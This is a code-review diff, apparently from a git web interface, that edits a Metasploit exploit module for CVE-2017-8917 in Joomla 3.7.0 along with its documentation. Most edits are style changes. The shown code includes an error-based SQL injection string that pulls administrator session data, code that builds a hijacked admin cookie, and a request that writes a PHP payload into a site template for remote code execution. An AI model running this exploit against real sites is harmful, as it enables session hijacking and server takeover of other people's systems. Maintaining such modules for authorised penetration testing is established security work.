Changes suggested by h00die
parent
05a653b853
commit
048d0d1fe4
|
@ -1,7 +1,7 @@
|
|||
## Vulnerable Application
|
||||
|
||||
This module exploits a sql injection in the core of Joomla 3.7.0.
|
||||
This vulnerability can allow remote code execution.
|
||||
This module exploits a SQL Injection vulnerability in the com_fields component which was introduced to the core of Joomla in version 3.7.0.
|
||||
With the SQLi, its possible to enumerate cookies of administrative users, and hijack one of their sessions. If no administrators are authenticated, the RCE portion will not work. If a session hijack is available, one of the website templates is identified, and our payload is added to the template as a new file, and then executed.
|
||||
|
||||
## Verification
|
||||
|
||||
|
@ -15,7 +15,7 @@
|
|||
|
||||
## Scenarios
|
||||
|
||||
### Joomal 3.7.0 and an administrator must be authenticated in the backend
|
||||
### Joomal 3.7.0 on Ubuntu 16.04 with another user authenticated as an administrator
|
||||
|
||||
```
|
||||
msf > use exploit/unix/webapp/joomla_comfields_sqli_rce
|
||||
|
|
|
@ -11,7 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Joomla Component Fields SQLi Remote Code Execution",
|
||||
'Name' => 'Joomla Component Fields SQLi Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a SQL injection vulnerability found in Joomla versions
|
||||
3.7.0.
|
||||
|
@ -25,6 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2017-8917' ], # SQLi
|
||||
['EDB', '42033'],
|
||||
[ 'URL', 'https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html' ]
|
||||
],
|
||||
'Payload' =>
|
||||
|
@ -41,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
[ 'Joomla 3.7.0', {} ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "May 17 2017",
|
||||
'DisclosureDate' => 'May 17 2017',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
|
@ -68,9 +69,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
def sqli( tableprefix , option)
|
||||
|
||||
# SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in).
|
||||
# The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history.
|
||||
# The extra search for userid!=0 is because of our SQL data that's inserted in the session cookie history.
|
||||
# This way we make sure that's excluded and we only get real admin sessions.
|
||||
|
||||
if option == 'check'
|
||||
sql = "(UPDATEXML(2170,CONCAT(0x2e,0x7170716a71,(SELECT MID((IFNULL(CAST(TO_BASE64(table_name) AS CHAR),0x20)),1,22) FROM information_schema.tables order by update_time DESC LIMIT 1),0x7171717171),4879))"
|
||||
else
|
||||
|
@ -88,7 +88,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
}
|
||||
})
|
||||
|
||||
|
||||
return res
|
||||
|
||||
end
|
||||
|
@ -133,14 +132,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
# Modify cookie to authenticated admin
|
||||
auth_cookie = cookie_begin
|
||||
auth_cookie << "="
|
||||
auth_cookie << '='
|
||||
auth_cookie << auth_cookie_part
|
||||
auth_cookie << ";"
|
||||
auth_cookie << ';'
|
||||
|
||||
# Authenticated session
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
|
||||
'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'),
|
||||
'cookie' => auth_cookie
|
||||
})
|
||||
|
||||
|
@ -154,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
# Retrieve template view
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
|
||||
'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'),
|
||||
'cookie' => auth_cookie,
|
||||
'vars_get' => {
|
||||
'option' => 'com_templates',
|
||||
|
@ -183,7 +182,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
print_status("#{peer} - Creating file [ #{filename}.php ]")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
|
||||
'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'),
|
||||
'cookie' => auth_cookie,
|
||||
'vars_get' => {
|
||||
'option' => 'com_templates',
|
||||
|
|
Loading…
Reference in New Issue